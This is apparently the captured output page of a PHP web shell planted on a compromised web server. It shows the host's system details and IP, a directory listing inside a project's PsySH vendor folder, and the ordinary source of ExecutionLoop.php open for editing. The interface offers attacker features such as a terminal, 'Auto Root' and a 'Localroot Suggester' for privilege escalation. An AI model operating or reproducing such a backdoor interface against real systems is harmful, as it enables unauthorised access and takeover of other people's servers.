Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.19.255.50
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-test /
vendor /
psy /
psysh /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
CodeCleaner
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
Command
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
Exception
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
ExecutionLoop
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
Formatter
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
Input
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
Output
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
Readline
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
Reflection
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
Sudo
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
TabCompletion
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
Util
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
VarDumper
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
VersionUpdater
[ DIR ]
drwxr-xr-x
2018-10-13 15:16
CodeCleaner.php
10.34
KB
-rw-r--r--
2018-10-13 15:16
ConfigPaths.php
6.31
KB
-rw-r--r--
2018-10-13 15:16
Configuration.php
33.93
KB
-rw-r--r--
2018-10-13 15:16
ConsoleColorFactory.php
2.26
KB
-rw-r--r--
2018-10-13 15:16
Context.php
7.75
KB
-rw-r--r--
2018-10-13 15:16
ContextAware.php
567
B
-rw-r--r--
2018-10-13 15:16
ExecutionClosure.php
3
KB
-rw-r--r--
2018-10-13 15:16
ExecutionLoop.php
1.68
KB
-rw-r--r--
2018-10-13 15:16
ExecutionLoopClosure.php
3.44
KB
-rw-r--r--
2018-10-13 15:16
ParserFactory.php
2.28
KB
-rw-r--r--
2018-10-13 15:16
Shell.php
36.85
KB
-rw-r--r--
2018-10-13 15:16
Sudo.php
4.04
KB
-rw-r--r--
2018-10-13 15:16
functions.php
12.08
KB
-rw-r--r--
2018-10-13 15:16
Save
Rename
<?php /* * This file is part of Psy Shell. * * (c) 2012-2018 Justin Hileman * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Psy; use Psy\Exception\ErrorException; /** * The Psy Shell execution loop. */ class ExecutionLoop { /** * Run the execution loop. * * @throws ThrowUpException if thrown by the `throw-up` command * * @param Shell $shell */ public function run(Shell $shell) { $this->loadIncludes($shell); $closure = new ExecutionLoopClosure($shell); $closure->execute(); } /** * Load user-defined includes. * * @param Shell $shell */ protected function loadIncludes(Shell $shell) { // Load user-defined includes $load = function (Shell $__psysh__) { \set_error_handler([$__psysh__, 'handleError']); foreach ($__psysh__->getIncludes() as $__psysh_include__) { try { include $__psysh_include__; } catch (\Error $_e) { $__psysh__->writeException(ErrorException::fromError($_e)); } catch (\Exception $_e) { $__psysh__->writeException($_e); } } \restore_error_handler(); unset($__psysh_include__); // Override any new local variables with pre-defined scope variables \extract($__psysh__->getScopeVariables(false)); // ... then add the whole mess of variables back. $__psysh__->setScopeVariables(\get_defined_vars()); }; $load($shell); } }